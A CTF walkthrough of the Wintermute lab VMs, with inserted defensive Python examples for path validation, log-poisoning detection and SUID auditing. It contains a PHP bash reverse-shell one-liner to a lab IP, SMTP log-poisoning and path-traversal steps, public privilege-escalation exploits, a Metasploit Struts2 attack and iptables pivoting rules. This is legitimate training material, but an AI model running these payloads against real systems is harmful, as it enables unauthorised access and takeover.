At the time of writing this post Wintermute doesn't seem to have a writeup, so I decided to make one. After finally getting root on both machines, I have to say this was a hard challenge. I'm fairly new to this whole pentesting gig, so it took me a while to figure stuff out. But at the same time it was a great experience and I've learned a lot. Obviously, looking back at it now with some perspective, it doesn't seem that hard, but trust me, it really pushed me to my wits' end.
The challenge consists of two virtual machines, Straylight and Neuromancer, with the "plot" revolving around the cyberpunk classic "Neuromancer" by William Gibson (tried reading it once, but the translation in my native language was terrible; I need to get me an original :).
Straylight has two interfaces, the first connected to the outside world, the second connected to an internal network. Neuromancer has only one interface, connected to the internal network (same subnet as the first machine), so the goal is to tackle Straylight first, then pivot to Neuromancer. In general, the whole challenge is about pivoting a lot.
Setting up the VMs was fairly straightforward. After that I logged in to my Kali machine and began hacking.
Quick summary
This writeup is quite long, so for those looking for a quick hint, below is a short summary of the steps:
- Service enumeration on Straylight;
- Checking web site 1;
- Checking web site 2;
- Pivoting to web site 3 (look for the URL in web site 2);
- Exploiting path traversal in a PHP script on web site 3, getting a limited shell;
- Privilege escalation via a vulnerable app (look for SUID), getting root;
- Setting up routing between Kali <-> Straylight <-> Neuromancer;
- Service enumeration on Neuromancer;
- Remotely exploiting Neuromancer, getting a shell;
- Exploiting Neuromancer's kernel, getting root.
Part 1: Enumeration
The first thing to do was to discover the IP address of the first machine. I did this using netdiscover:
netdiscover -i eth1 -r 192.168.56.0/24
Results:
Since the first IP is the gateway and the second is the DHCP server, the only valid IP left was the one I've marked in red - this is the Straylight machine.
Knowing its IP, I moved to the next stage, which was an nmap scan:
nmap -A -p- 192.168.56.105
Results:
So as you can see, there were 3 services running:
- Postfix/smtp on port 25;
- Apache2/httpd on port 80;
- Apache/hadoop on port 3000;
Yet again I fired up nmap, this time with the --script parameter pointing to the vulscan NSE script that I downloaded from https://www.computec.ch/projekte/vulscan/. It's basically a module that enhances nmap with vulnerability scanning capabilities (thanks Sekurak! https://sekurak.pl/nmap-w-akcji-przykladowy-test-bezpieczenstwa/)
nmap -sV --script=vulscan -p T:25,80,3000 192.168.56.105
I was hoping for some quick exploit, but unfortunately the above command didn't yield any actionable results.
I assumed I was probably not going to get a shell via Postfix, so my next step was to look closer at the web applications on ports 80 and 3000.
First, I used dirb:
dirb http://192.168.56.105 -R
There was a /manual directory, which I decided to skip since I knew it would take a lot of time to scan (and I doubted it contained anything I could use); hence the -R parameter in dirb.
Next, I used nikto:
nikto -h 192.168.56.105
But it didn't produce any useful results, so I moved to the last service, the web application on port 3000. Unfortunately, again neither dirb nor nikto produced anything useful.
At this point I didn't have much, so I decided to check both services in the browser and look for vulnerabilities in the web apps themselves.
Part 2: Web applications
I started with the first webapp on port 80. It was just some generic "welcome to the challenge" page. I checked the source code and decided to move on to the second webapp on port 3000.
This was more interesting, as the landing page served me the login page of an app called ntopng, which is a web-based network traffic monitoring application. Getting into it was a no-brainer since there was a little hint at the bottom of the login form.
After logging in, I checked the ntopng app content and found the "About ntopng" page:
This looked really interesting - the full technology stack used by ntopng, with versions listed. I thought maybe something here was vulnerable and I could exploit it, so I began manually checking CVE databases. To my disappointment, most of them had vulnerabilities, but none was useful to me. Nothing that would give me a shell.
At this point I got stuck really badly. I retraced my steps twice, thinking maybe I had missed something. I spent a couple of hours walking in circles, moved back to the Postfix/SMTP service that I had left for later, discovered it required no authentication and so tried shellshocking it, but it didn't work. At this point I was really desperate, so I tried enumerating the directories of the first web app again, this time using a longer wordlist with DirBuster.
It took a while, but to my surprise it gave me one directory I hadn't found before: /freeside.
I got excited, but unfortunately this was a dead end. It was a simple page, displaying Freeside - a space station belonging to the Tessier-Ashpool family (the bad guys from the "Neuromancer" book).
But it got me thinking - maybe there is a hidden site on this server? Nothing else showed up in the DirBuster scan, but maybe the URL is more exotic and that's why it didn't appear anywhere in the wordlist. This was a light bulb moment for me. That's why the ntopng app is there - the hidden site's URL must be somewhere in it.
So I got back to ntopng and there it was:
I have no idea how I missed it the first time - it would have saved me hours. The server IP was weird (localhost), but as I later found out, there was a bash script running in the background making constant connections to this URL.
Part 3: Path Traversal
After finding the new URL in ntopng I went to check it. This looked promising. At the bottom of the page there was a little dropdown list, allowing you to choose which log you wanted to display.
Right away this smelled like a path traversal vulnerability, so I tried passing different parameters to bolo.php, and it looked like I was on the right track - I didn't get any 404s, just a blank page.
So I fired up dotdotpwn.pl:
dotdotpwn.pl -m http-url -u "http://192.168.56.105/turing-bolo/bolo.php?bolo=TRAVERSAL" -k "root:"
But it didn't yield any results.
I got a little frustrated here, started trying different combinations, and finally found out I could peek into the /var/log directory and view some of the files that were there - like mail.log. So based on that and what was written on the landing page:
Operator Gamma: Adding other member logs to directory...:
molly.log
armitage.log
riviera.log
I figured the only files I could view were the ones ending with .log and readable by the user running the web server.
A closer look into the mail.log file revealed it contained the Shellshock code I had tried before:
This was great news, as it meant I could probably inject PHP code in there as well, and use it to spawn me a shell!
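The behaviour just described (a user-supplied name gets ".log" appended and is opened with no further checks) is worth seeing next to the fix. The following is an added example written for this writeup, not code from the challenge VM; the bolo.php source was never shown, so the log directory path and function names are assumptions. The vulnerable helper reproduces the observed effect, and the hardened helper shows the two checks a log viewer should make: an allowlist on the name, and a canonical-path containment check.

```python
import os
import re

# Assumed layout (not taken from the target): the viewer serves "<name>.log"
# files from one dedicated directory.
LOG_DIR = "/var/www/turing-bolo"

# Only plain stems such as "molly", "armitage" or "riviera" are acceptable.
# No dots, slashes or percent signs, so "..", "/", "\" and "%2e" never pass.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def vulnerable_log_path(log_dir, bolo):
    """The unsafe pattern described in the writeup: concatenate and trust the input.

    Only ".log" is appended, so "../../../var/log/mail" walks out of log_dir
    and lands on /var/log/mail.log, which is exactly what the traversal found.
    """
    return os.path.normpath(os.path.join(log_dir, bolo + ".log"))


def safe_log_path(log_dir, bolo):
    """Return the file to serve, or raise ValueError for anything suspicious."""
    # Check 1: the name must be a simple identifier; the server owns the extension.
    if not SAFE_NAME.fullmatch(bolo):
        raise ValueError("log name must be a plain identifier")
    # Check 2: canonicalise and confirm the result is still inside log_dir.
    # realpath() follows symlinks, so a planted link cannot escape either.
    base = os.path.realpath(log_dir)
    target = os.path.realpath(os.path.join(base, bolo + ".log"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the log directory")
    return target


def is_allowed(log_dir, bolo):
    """Boolean wrapper for request handlers: True if the name would be served."""
    try:
        safe_log_path(log_dir, bolo)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed probes: one legitimate name and three traversal-style inputs.
    for probe in ("molly", "../../../var/log/mail", "..%2f..%2fetc/passwd", "molly.log"):
        print(f"{probe!r:28} vulnerable -> {vulnerable_log_path(LOG_DIR, probe)}")
        print(f"{'':28} hardened   -> {'allowed' if is_allowed(LOG_DIR, probe) else 'rejected'}")
```

The allowlist alone already stops the traversal; the containment check is kept as a second layer because it also catches symlinks dropped into the log directory, which a name filter cannot see.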
Part 4: Getting shell
As I wrote before, I already knew that Postfix/SMTP didn't require authentication. So the simplest thing to do was to fire up good ol' telnet and try to inject PHP code. Mind you, this took me some time before getting it right.
After the injection was done, I checked the logs again to see if it had worked.
And there it was. So now the only thing left to do was to cook up some php-shell-spawning one-liner.
Since I don't know PHP that well, I used Google and found this beauty:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102:4444 0>&1'"); ?>
Source: https://gist.github.com/rshipp/eee36684db07d234c1cc
What this piece of code does is spawn an interactive bash shell, redirect its stdout and stderr (>&) to a TCP socket (which bash itself opens via /dev/tcp) connected to my Kali box, and then take its stdin from that same socket (0>&1).
I started nc on my Kali machine:
nc -lvp 4444
Injected the code, refreshed the page, and there it was - finally a shell:
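From the defender's side, the whole chain in Parts 3 and 4 hinges on attacker-controlled text landing in a file the web server later interprets. As an added example (not part of the original post), here is a small detector that scans Postfix mail.log lines for the markers such a poisoning attempt leaves behind: PHP open tags, the Shellshock function-definition prefix, and bash /dev/tcp redirects. The log lines are constructed for this example and are not from the challenge machine.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in Postfix mail.log style; not captured from the target.
# Lines 4 and 5 carry the kind of payload a log-poisoning attempt leaves behind.
SAMPLE_MAIL_LOG = """\
Jan  1 10:00:01 straylight postfix/smtpd[1234]: connect from unknown[192.168.56.102]
Jan  1 10:00:05 straylight postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[192.168.56.102]: 450 4.1.1 <nobody@localhost>: Recipient address rejected: User unknown
Jan  1 10:00:09 straylight postfix/smtpd[1234]: warning: unknown[192.168.56.102]: SASL LOGIN authentication failed
Jan  1 10:00:12 straylight postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[192.168.56.102]: 450 4.1.1 <() { :;}; /bin/bash -c 'id'@localhost>: Recipient address rejected
Jan  1 10:00:20 straylight postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[192.168.56.102]: 450 4.1.1 <<?php exec('id'); ?>@localhost>: Recipient address rejected
Jan  1 10:00:25 straylight postfix/smtpd[1234]: disconnect from unknown[192.168.56.102]
"""

# Indicator name -> pattern. Keep patterns narrow so normal MIME noise does not fire.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("php_open_tag", re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)),
    ("shellshock_function_def", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("bash_tcp_redirect", re.compile(r"/dev/tcp/\d")),
]

# Postfix writes the peer as "name[a.b.c.d]"; pull the dotted quad out.
CLIENT_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def scan_mail_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, indicator, client_ip) for every suspicious line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        ip_match = CLIENT_IP.search(line)
        client_ip = ip_match.group(1) if ip_match else "unknown"
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((number, name, client_ip))
    return hits


def sources_by_hits(hits: List[Tuple[int, str, str]]) -> Dict[str, int]:
    """Aggregate hits per client IP, the pivot an analyst usually wants first."""
    counts: Dict[str, int] = {}
    for _number, _name, client_ip in hits:
        counts[client_ip] = counts.get(client_ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_mail_log(SAMPLE_MAIL_LOG)
    for number, name, client_ip in found:
        print(f"line {number}: {name} from {client_ip}")
    print("per source:", sources_by_hits(found))
```

Running the same patterns over whatever file a web application includes or displays (here the .log files exposed by bolo.php) is the cheaper fix than trying to sanitise every protocol that can write to that file; the robust fix remains not executing or including log content at all.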
Part 5: Upgrading shell
As we all know, a limited shell via nc is hateful, so the first thing to do was to spawn me a normal shell.
I googled a bit and found this cute program called socat and a great article describing how to use it:
This was perfect for me, so I uploaded the socat binary to Straylight using wget, executed the described method and got a normal shell.
I strongly recommend getting familiar with this program, it just makes your life easier.
Part 6: Privilege escalation
Finally came the time to escalate to root. As I said, I'm new in this field and it took me a lot of time and research on this topic before I came up with the solution. It might seem simple now, but trust me, it wasn't.
First, I used this great cheat sheet: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
But it would take a lot of time to go through each of the listed commands, so I started looking for a way to automate the process, and I found this neat python script:
https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
I checked the results (actually I checked them several times, and even redid some of the tests manually before figuring this out) and one thing that stood out was the Screen-4.5.0 program with SUID set. Mind you, screen with SUID set is not weird; it was the exact version in the filename that seemed a bit off to me.
So again I went to uncle Google for advice, and surprise, surprise, Screen 4.5.0 is vulnerable to local privilege escalation: https://www.exploit-db.com/exploits/41154/
I downloaded the above exploit to the target machine using wget and fired it up:
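The two observations above (a setuid binary that is not in the usual set, and a version number baked into its file name) are exactly what a host baseline check should flag. The following is an added example for this writeup, not part of the original post or of linuxprivchecker: the filesystem walker mirrors `find / -perm -4000`, and the classifier works on (path, mode) pairs so it can be run against a live host or, as in the constructed data below, against a recorded inventory. The baseline list of expected setuid names is an assumption for a typical Debian-style install.

```python
import os
import re
import stat
from typing import Iterable, List, Tuple

# Assumed baseline of binaries that are legitimately setuid-root on a typical
# Debian/Ubuntu host; trim or extend it for the systems you actually manage.
EXPECTED_SUID = {
    "passwd", "su", "sudo", "mount", "umount", "chsh", "chfn", "gpasswd",
    "newgrp", "ping", "ping6", "pkexec", "fusermount", "ntfs-3g",
}

# A version number embedded in the file name (e.g. screen-4.5.0) hints that a
# specific build was dropped beside the distro-managed binary.
VERSIONED_NAME = re.compile(r"-\d+(\.\d+)+$")


def walk_files(root: str) -> List[Tuple[str, int]]:
    """Collect (path, mode) for everything under root, without following symlinks."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                out.append((path, os.lstat(path).st_mode))
            except OSError:
                continue  # unreadable or vanished; skip rather than abort the sweep
    return out


def find_suid(entries: Iterable[Tuple[str, int]]) -> List[str]:
    """Paths of regular files with the setuid bit, i.e. what find -perm -4000 lists."""
    return [path for path, mode in entries if stat.S_ISREG(mode) and mode & stat.S_ISUID]


def unexpected_suid(entries: Iterable[Tuple[str, int]]) -> List[Tuple[str, str]]:
    """Setuid files outside the baseline, each with the reason it was flagged."""
    flagged = []
    for path in find_suid(entries):
        name = os.path.basename(path)
        if name in EXPECTED_SUID:
            continue
        reason = "versioned filename" if VERSIONED_NAME.search(name) else "not in baseline"
        flagged.append((path, reason))
    return flagged


# Constructed inventory (not from the challenge VM) in the (path, st_mode) shape
# that walk_files() produces; 0o100000 marks a regular file, 0o040000 a directory.
SAMPLE_INVENTORY = [
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/sudo", 0o104755),
    ("/bin/ls", 0o100755),
    ("/tmp/scratch", 0o044755),          # directory with the bit set: ignored
    ("/usr/local/bin/screen-4.5.0", 0o104755),
    ("/opt/tool/helper", 0o104711),
]

if __name__ == "__main__":
    for path, reason in unexpected_suid(SAMPLE_INVENTORY):
        print(f"{path}: {reason}")
    # On a live host: unexpected_suid(walk_files("/"))
```

Comparing a fresh sweep against one taken at build time is usually more useful than the static baseline, since any newly appeared setuid file is interesting regardless of its name.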
And there it was, finally :) Again I used the socat trick to upgrade my shell and read the contents of /root/
Especially interesting was the bit about custom Java App with URL.
Part 7: Setting up routing
As described at the beginning of this writeup, the network situation looked like this (please don't judge, my network diagram creation skills are not so good):
Since my Kali box was in a different network than Neuromancer, in order to get to it I first had to go via Straylight. The idea was to use Straylight as a router. The simplest way to do it would be to enable forwarding on Straylight, add a route to network 192.168.254.0/24 via 192.168.56.105 on Kali, and a route to 192.168.56.0/24 via 192.168.254.3 on Neuromancer. But because I didn't have access to Neuromancer, this was impossible. Kali would have access to 192.168.254.0/24, but nothing would come back.
Another way to do it would be to make Straylight the default gateway for both machines. I could have ARP poisoned Neuromancer, tricking it into thinking Straylight's MAC is its gateway, but since Neuromancer was in an isolated VBox host-only network, it didn't have any default gateway to begin with.
So the only way to do it was to set up NAT on Straylight, which is exactly what I did.
iptables -t nat -A POSTROUTING -o eth1 -j SNAT --to-source 192.168.254.3
Setting up forwarding is very easy and there are plenty of tutorials explaining it already, so I'm not going to do that here.
I also needed to add a route to 192.168.254.0/24 on my Kali box.
ip r add 192.168.254.0/24 via 192.168.56.105
The next thing to do was to find out Neuromancer's IP address. I couldn't use netdiscover, because it relies on ARP, which is not routable. So I peeked at the ARP table on Straylight:
The IP at the top was the one I was looking for. I knew this because 192.168.254.3 was the IP of Straylight, and there were no other machines in the subnet. In a real-world scenario there might be more than two machines in the subnet, so this is not the best way to do it.
Anyway, now I had Neuromancer's IP and I could begin enumeration of its services.
Part 8: Neuromancer enumeration
Same as with Straylight, I fired up nmap.
And got three services:
- Apache Jserv on 8009;
- Apache/Tomcat on 8080;
- SSH on 34483;
Tomcat on 8080 was no surprise, since I already knew it was there from the contents of the note on Straylight. I decided to focus on it first.
From the URL I knew the exact version of this service (Apache Struts2 2.3.15.1), so I started looking for exploits. There were quite a few of them, so I searched a little bit more and found out that the one I was looking for is included in the Metasploit framework, under the name struts2_content_type_ognl.
I set the rhost and targeturi options to point to the application, then chose the payload linux/x86/shell/reverse_tcp, and set lhost to the Straylight IP 192.168.254.3 and lport to 4477. I couldn't point the payload to my Kali box directly, because, as you might remember, it was sitting behind NAT. So I had to add a little port-forwarding rule to the Straylight box.
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 4477 -j DNAT --to-destination 192.168.56.102
After that I fired the exploit.
And from the looks of it, it was super effective. I got a shell as user ta. Once again I did a little socat magic to ease my endeavours and proceeded to the last stage.
Part 9: Privilege escalation on Neuromancer
To be honest, getting root on this box was easy compared to the rest of the challenge. I found out the kernel version and distro:
And quick google search revealed existing kernel exploit: https://www.exploit-db.com/exploits/44298/
I compiled it using gcc and again used wget to download it to the target (I had to open another port for this).
And there it is. The contents of the flag:
Summary
This was a great experience and I had a lot of fun. Thanks to @creosote for creating this challenge. If I had to summarize what I've learned: enumeration is everything. I can't stress this enough. If I had focused a bit more on thorough enumeration, I would have finished this challenge much quicker.
That's it, folks, thanks for reading. I'll be posting more of these soon.